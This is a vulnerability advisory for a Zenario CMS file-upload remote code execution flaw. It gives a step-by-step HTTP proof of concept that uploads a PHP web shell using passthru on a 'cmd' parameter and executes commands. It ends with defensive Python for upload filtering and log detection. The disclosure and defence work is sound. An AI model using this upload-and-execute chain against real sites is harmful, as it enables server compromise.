Zenario CMS 7.0.7c Remote Code Execution Vulnerability


Vendor: Tribal Ltd.
Product web page: http://www.zenar.io
Affected version: <= 7.0.7c and 7.1.0 (svn)

Summary: Zenario is a web-based content management system for sites with
one or many languages. It's designed to grow with your site, adding extranet,
online database and custom functionality when you need it.

Desc: The vulnerability is caused by improper verification of uploaded files
in the Document upload script, which takes the file from the 'Filedata' POST
parameter. This allows arbitrary files to be uploaded into
'/public/downloads/' and reached through a publicly generated link; the only
precondition is that an admin first adds the file extension to the allowed
list. This can be exploited to execute arbitrary PHP code by uploading a
malicious PHP script file and then running system commands through it.

Tested on: Ubuntu 14.04 LTS
           PHP 5.5.9-1ubuntu4.1
           Zend Engine v2.5.0
           Zend OPcache v7.0.3
           MySQL/5.5.37

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2015-5280
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5280.php
Vendor: http://zenar.io/zenario-707d

27.10.2015

--


----------------------
1. Add php5 file type:
----------------------

GET http://192.168.0.17/zenario/admin/organizer.php?fromCID=1&fromCType=html#zenario__administration/panels/file_types HTTP/1.1

POST /zenario/admin/ajax.php?_json=1&_ab=1&path=zenario_file_type HTTP/1.1
Host: 192.168.0.17
Connection: keep-alive
Content-Length: 516
Accept: text/plain, */*; q=0.01
Origin: http://192.168.0.17
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.0.17/zenario/admin/organizer.php?fromCID=1&fromCType=html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35

_save=true&_confirm=&_box={"key":{"id":""},"tabs":{"details":{"edit_mode":{"on":1},"fields":{"type":{"current_value":"php5"},"mime_type":{"current_value":"application/octet-stream"}}}},"_sync":{"cache_dir":"ab_PBtBxW05_mPQDMgpv","password":"/L9HLsICPXzTD93VPn4Ou2Yw6HW6f4CPMFANLol7rcI=","iv":"7XoL6dLYAaMfqXgy7DfOeQ==","session":false}}


---------------
2. Upload file:
---------------

POST /zenario/ajax.php?__pluginClassName__=undefined&__path__=zenario_document_upload&method_call=handleAdminBoxAJAX HTTP/1.1
Host: 192.168.0.17
Content-Length: 458
Origin: http://192.168.0.17
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
X_FILENAME: phpinfo.php5
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUrDf3o8emcPIM8oD
Accept: */*
Referer: http://192.168.0.17/zenario/admin/organizer.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35

------WebKitFormBoundaryUrDf3o8emcPIM8oD
Content-Disposition: form-data; name="id"

12
------WebKitFormBoundaryUrDf3o8emcPIM8oD
Content-Disposition: form-data; name="fileUpload"

1
------WebKitFormBoundaryUrDf3o8emcPIM8oD
Content-Disposition: form-data; name="Filedata"; filename="phpinfo.php5"
Content-Type: application/octet-stream

"; passthru($_GET['cmd']); echo ""; ?>
------WebKitFormBoundaryUrDf3o8emcPIM8oD--


------------------------
3. Save and verify file:
------------------------

POST /zenario/admin/ajax.php?_json=1&_ab=1&path=zenario_document_upload&id=12 HTTP/1.1
Host: 192.168.0.17
Content-Length: 530
Accept: text/plain, */*; q=0.01
Origin: http://192.168.0.17
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.0.17/zenario/admin/organizer.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35

_save=true&_confirm=&_box={"key":{"id":"12","fileUpload":1},"tabs":{"upload_document":{"edit_mode":{"on":1},"fields":{"document__upload":{"_display_value":"phpinfo.php5","current_value":"~79fa169880192652f933c1834aae09f40c4fc39c~2Fphpinfo.php5"}}}},"_sync":{"cache_dir":"ab_uMwuijj5_YP_0GAuZ","password":"/NUErtsIJtkXJXJqRr0pbt8oqAIUqz0GVdjJung5J/4=","session":false}}


------------------------
4. Generate public link:
------------------------

POST /zenario/ajax.php?__pluginClassName__=zenario_common_features&__path__=zenario__content/panels/documents&method_call=handleOrganizerPanelAJAX HTTP/1.1
Host: 192.168.0.17
Content-Length: 28
Accept: text/plain, */*; q=0.01
Origin: http://192.168.0.17
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.0.17/zenario/admin/organizer.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35

id=27&generate_public_link=1


----------------
5. Execute code:
----------------

GET http://192.168.0.17/zenario/public/downloads/RvoId/phpinfo.php5?cmd=id;pwd HTTP/1.1
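The root cause above is that the admin-editable file-type list is the only barrier between an upload and a web-served, PHP-executing directory. The following is an added defender-side example, not code from the advisory or from Zenario: a defence-in-depth upload policy that refuses server-executable extensions regardless of the allow-list, plus a detector that flags access-log requests for files under /public/downloads/ with such extensions (the pattern of steps 1 and 5). The function names, the extension set and the log lines are all constructed for this example.

```python
import re
from urllib.parse import urlsplit

# Extensions a typical PHP web server may execute as code. They are refused
# even when an administrator has added them to the CMS's allowed file types,
# which is exactly the configuration step the advisory relies on (php5).
EXECUTABLE_EXTENSIONS = frozenset({
    "php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps",
    "cgi", "pl", "py", "sh", "asp", "aspx", "jsp",
})

def extensions_of(filename: str) -> list[str]:
    """All extensions of a name, lower-cased: 'shell.php5.txt' gives
    ['php5', 'txt'], so double-extension names are judged on every part."""
    name = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1].strip().rstrip(".")
    return [p for p in name.lower().split(".")[1:] if p]

def is_upload_allowed(filename: str, allowed_types: set[str]) -> bool:
    """Accept only if no part of the name is executable AND the final
    extension is on the admin allow-list; the allow-list alone is not a
    safety boundary because admins can (and here did) extend it."""
    exts = extensions_of(filename)
    if not exts or any(e in EXECUTABLE_EXTENSIONS for e in exts):
        return False
    return exts[-1] in {t.lower().lstrip(".") for t in allowed_types}

# Constructed Apache-style access-log lines (sample data, not real traffic).
SAMPLE_LOG = """\
192.168.0.50 - - [27/Oct/2015:10:12:01 +0100] "GET /zenario/public/downloads/RvoId/phpinfo.php5?cmd=id;pwd HTTP/1.1" 200 512
192.168.0.51 - - [27/Oct/2015:10:13:44 +0100] "GET /zenario/public/downloads/AbCdE/report.pdf HTTP/1.1" 200 90210
192.168.0.52 - - [27/Oct/2015:10:14:09 +0100] "GET /zenario/public/downloads/XyZ12/notes.PHTML HTTP/1.1" 200 77
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def suspicious_download_requests(log_text: str) -> list[str]:
    """Request targets under /public/downloads/ whose file name carries a
    server-executable extension: a 'download' the server may run instead of
    serving, which is the advisory's final step."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m is None:
            continue
        path = urlsplit(m.group(1)).path
        if "/public/downloads/" in path and any(
                e in EXECUTABLE_EXTENSIONS for e in extensions_of(path)):
            hits.append(m.group(1))
    return hits
```

The policy check belongs server-side at upload time; the complementary hardening is to configure the web server so nothing under the downloads directory is handed to the PHP interpreter at all.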